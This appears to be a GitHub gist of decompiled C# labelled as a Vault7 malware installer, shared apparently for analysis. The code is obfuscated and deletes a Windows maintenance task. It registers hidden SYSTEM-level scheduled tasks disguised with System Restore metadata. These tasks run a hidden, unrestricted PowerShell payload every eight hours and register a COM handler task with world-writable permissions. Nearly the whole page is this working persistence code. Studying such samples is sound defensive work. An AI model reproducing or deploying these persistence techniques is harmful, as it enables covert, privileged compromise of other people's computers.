Created
March 10, 2017 07:14
-
-
Save msuiche/a1705132ceab15d29375429f637ab610 to your computer and use it in GitHub Desktop.
Installer.dll (Vault7)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Decompiled with JetBrains decompiler | |
// Type: Installer.Install | |
// Assembly: Installer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null | |
// MVID: 1DF6A781-016A-4A47-9C62-874A888EB357 | |
// Assembly location: | |
using \u0004; | |
using \u0006; | |
using Microsoft.Win32; | |
using System; | |
using System.IO; | |
using System.Runtime.InteropServices; | |
using System.Security.Principal; | |
using TaskScheduleHelper; | |
namespace Installer | |
{ | |
public class Install | |
{ | |
private static string \u0001 = "\\Microsoft\\Windows\\Maintenance"; | |
private static string \u0002 = "SR ".TrimEnd(); | |
public Install() | |
{ | |
this.\u0002(); | |
this.\u0003(); | |
this.\u0001(); | |
} | |
private void \u0001() | |
{ | |
try | |
{ | |
Registry.LocalMachine.CreateSubKey("SOFTWARE\\Policies\\Microsoft\\Internet Explorer\\Main").SetValue("DisableFirstRunCustomize", (object) 1); | |
} | |
catch (Exception ex) | |
{ | |
} | |
} | |
private void \u0002() | |
{ | |
try | |
{ | |
Registry.LocalMachine.CreateSubKey("SOFTWARE\\Microsoft\\DRM\\").CreateSubKey("{cd704ff3-cd05-479e-acf7-6474908031dd}").SetValue((string) null, (object) DateTime.Now.ToBinary()); | |
} | |
catch (Exception ex) | |
{ | |
} | |
} | |
private void \u0003() | |
{ | |
try | |
{ | |
ITaskService taskService = \u0001.\u0001(); | |
taskService.Connect((object) null, (object) null, (object) null, (object) null); | |
this.\u0001(taskService); | |
this.\u0002(taskService); | |
this.\u0003(taskService); | |
} | |
catch | |
{ | |
} | |
} | |
private void \u0001([In] ITaskService obj0) | |
{ | |
ITaskFolder folder = obj0.GetFolder("Microsoft\\Windows\\Maintenance"); | |
try | |
{ | |
folder.DeleteTask("CheckDisk", 0); | |
} | |
catch | |
{ | |
} | |
} | |
private void \u0002([In] ITaskService obj0) | |
{ | |
ITaskFolder folder = obj0.GetFolder("\\Microsoft\\Windows\\Task Manager"); | |
try | |
{ | |
IRegisteredTask registeredTask = (IRegisteredTask) null; | |
try | |
{ | |
registeredTask = folder.GetTask("System"); | |
} | |
catch (FileNotFoundException ex) | |
{ | |
} | |
if (registeredTask != null) | |
return; | |
IRegisteredTask task = folder.GetTask("Interactive"); | |
ITaskDefinition pDefinition = obj0.NewTask(0U); | |
pDefinition.Settings.AllowDemandStart = true; | |
pDefinition.Settings.MultipleInstances = _TASK_INSTANCES_POLICY.TASK_INSTANCES_PARALLEL; | |
pDefinition.Settings.DisallowStartIfOnBatteries = false; | |
pDefinition.Settings.Hidden = true; | |
pDefinition.Settings.Priority = 5; | |
pDefinition.RegistrationInfo.Author = task.Definition.RegistrationInfo.Author; | |
pDefinition.RegistrationInfo.Version = "1.0"; | |
pDefinition.RegistrationInfo.Source = task.Definition.RegistrationInfo.Source; | |
pDefinition.RegistrationInfo.Description = task.Definition.RegistrationInfo.Description; | |
IComHandlerAction comHandlerAction = (IComHandlerAction) pDefinition.Actions.Create(_TASK_ACTION_TYPE.TASK_ACTION_COM_HANDLER); | |
comHandlerAction.ClassId = "{855fec53-d2e4-4999-9e87-3414e9cf0ff4}"; | |
comHandlerAction.Data = "$(Arg0)"; | |
string str = "D:(A;;RPWPCCDCLCSWRCWDWOGA;;;S-1-1-0)"; | |
folder.RegisterTaskDefinition("System", pDefinition, 2, (object) "SYSTEM", (object) null, _TASK_LOGON_TYPE.TASK_LOGON_SERVICE_ACCOUNT, (object) str); | |
} | |
catch | |
{ | |
} | |
} | |
private string \u0001() | |
{ | |
return "\"$tn='" + Install.\u0002 + "';$tf='" + Install.\u0001 + "';" + \u0001.\u0001() + "\""; | |
} | |
private string \u0002() | |
{ | |
return Convert.ToBase64String(\u0001.\u0001()); | |
} | |
private void \u0003([In] ITaskService obj0) | |
{ | |
try | |
{ | |
ITaskFolder folder = obj0.GetFolder(Install.\u0001); | |
try | |
{ | |
folder.DeleteTask(Install.\u0002, 0); | |
} | |
catch (Exception ex) | |
{ | |
} | |
ITaskDefinition taskDefinition = obj0.NewTask(0U); | |
taskDefinition.RegistrationInfo.Author = "$(@%systemroot%\\system32\\srrstr.dll,-321)"; | |
taskDefinition.RegistrationInfo.Source = "$(@%systemroot%\\system32\\srrstr.dll,-320)"; | |
taskDefinition.RegistrationInfo.Description = "$(@%systemroot%\\system32\\srrstr.dll,-322)"; | |
taskDefinition.Settings.StartWhenAvailable = true; | |
taskDefinition.Settings.RunOnlyIfNetworkAvailable = true; | |
taskDefinition.Settings.StopIfGoingOnBatteries = false; | |
taskDefinition.Settings.DisallowStartIfOnBatteries = false; | |
taskDefinition.Settings.Hidden = true; | |
NTAccount ntAccount = (NTAccount) new SecurityIdentifier(WellKnownSidType.LocalSystemSid, (SecurityIdentifier) null).Translate(typeof (NTAccount)); | |
taskDefinition.Principal.RunLevel = _TASK_RUNLEVEL.TASK_RUNLEVEL_HIGHEST; | |
taskDefinition.Principal.LogonType = _TASK_LOGON_TYPE.TASK_LOGON_GROUP; | |
taskDefinition.Principal.GroupId = ntAccount.ToString(); | |
taskDefinition.Data = this.\u0002(); | |
IExecAction execAction = (IExecAction) taskDefinition.Actions.Create(_TASK_ACTION_TYPE.TASK_ACTION_EXEC); | |
execAction.Path = "powershell"; | |
execAction.Arguments = "-executionPolicy unrestricted -WindowStyle Hidden -NonInteractive -Command " + this.\u0001(); | |
ITimeTrigger timeTrigger = (ITimeTrigger) taskDefinition.Triggers.Create(_TASK_TRIGGER_TYPE2.TASK_TRIGGER_TIME); | |
timeTrigger.Repetition.Interval = "PT8H6M ".TrimEnd(); | |
timeTrigger.Repetition.StopAtDurationEnd = false; | |
timeTrigger.Enabled = true; | |
string str1 = "2016-01-21T00:00:00.0000000 ".TrimEnd(); | |
timeTrigger.StartBoundary = !str1.Equals("0") ? str1 : DateTime.Now.ToString("o"); | |
string str2 = "D:(A;;RPWPCCDCLCSWRCWDWOGA;;;S-1-1-0)"; | |
string XmlText = taskDefinition.XmlText.Replace("Task version=\"1.2\"", "Task "); | |
folder.RegisterTask(Install.\u0002, XmlText, 2, (object) "SYSTEM", (object) null, _TASK_LOGON_TYPE.TASK_LOGON_SERVICE_ACCOUNT, (object) str2); | |
} | |
catch (Exception ex) | |
{ | |
} | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment